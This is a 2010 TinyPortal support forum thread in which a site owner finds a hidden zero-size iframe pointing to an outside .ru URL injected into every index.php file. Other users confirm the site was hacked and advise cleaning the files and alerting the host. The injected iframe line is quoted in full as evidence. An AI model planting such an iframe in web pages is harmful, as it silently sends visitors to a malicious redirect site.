Text only | Text with Images

TinyPortal

Development => Support => Topic started by: Reality12 on June 12, 2010, 08:04:10 PM

Title: TP Files in Control Panel
Post by: Reality12 on June 12, 2010, 08:04:10 PM
Hello TP,

While trying to figure out where to edit the social bookmarks for TP, I was randomly navigating around my control panel and have run into an oddity; please see attached.

As you'll see from the attached, I have some folders called tp-downloads, tp-files and tp-images.

First question: Are these true Tiny Portal folders?

Now, after you navigate into each folder, all of them have a sub-folder or more, with an index.php file. Take the directory "/tp-files/tp-articles/index.php" for instance; when I click edit, each one of those files has the following:

Code Select
<?php

exit;

?>

<iframe src=http://letsmusic.ru/tds/go.php?sid=3 width=0 height=0 style="display:none"></iframe>

This has me a little concerned, as I don't believe TP is associated with the named website above.

Question two: Is it safe to say this is a hack?

If these aren't TP folders, can someone advise on how to proceed?
Title: Re: TP Files in Control Panel
Post by: JPDeni on June 12, 2010, 09:47:13 PM
This is not a hack. Those are real directories that are used for various things. The index.php files that you see there are just so that someone can't call up the directory and get a listing of the files.

However, the iframe that was added is evidence of a hacker being on your system. I would create a file with just

Code Select

<?php

exit;

?>


on it and save it to all of the files where you see that iframe code. Check the index.php files in every directory, because you may find it there also. Also, if you haven't already, tell your webhost about it. It may be that other sites that use the same server were also attacked.
Title: Re: TP Files in Control Panel
Post by: Lesmond on June 12, 2010, 10:19:33 PM
I agree with JP sounds like a hacker too, also do a scan on your pc for Trojans and viruses too!!
Title: Re: TP Files in Control Panel
Post by: Reality12 on June 12, 2010, 10:32:36 PM
Glad to know. I'll work on that and inform the host as well.

Thank you!

Title: Re: TP Files in Control Panel
Post by: Reality12 on June 12, 2010, 11:59:00 PM
Just got done, and thought I'd share that I got curious and checked other folders.

...Found out that whatever this was, attacked all 'index.' files in every directory.

I've cleared them out, but wow!  :o
Title: Re: TP Files in Control Panel
Post by: JPDeni on June 13, 2010, 01:05:17 AM
I had something like that a few weeks ago. It hit my account (every index.php and index.html file in four domain names) and all of the other sites that were hosted on the server. Good job for catching it.
Text only | Text with Images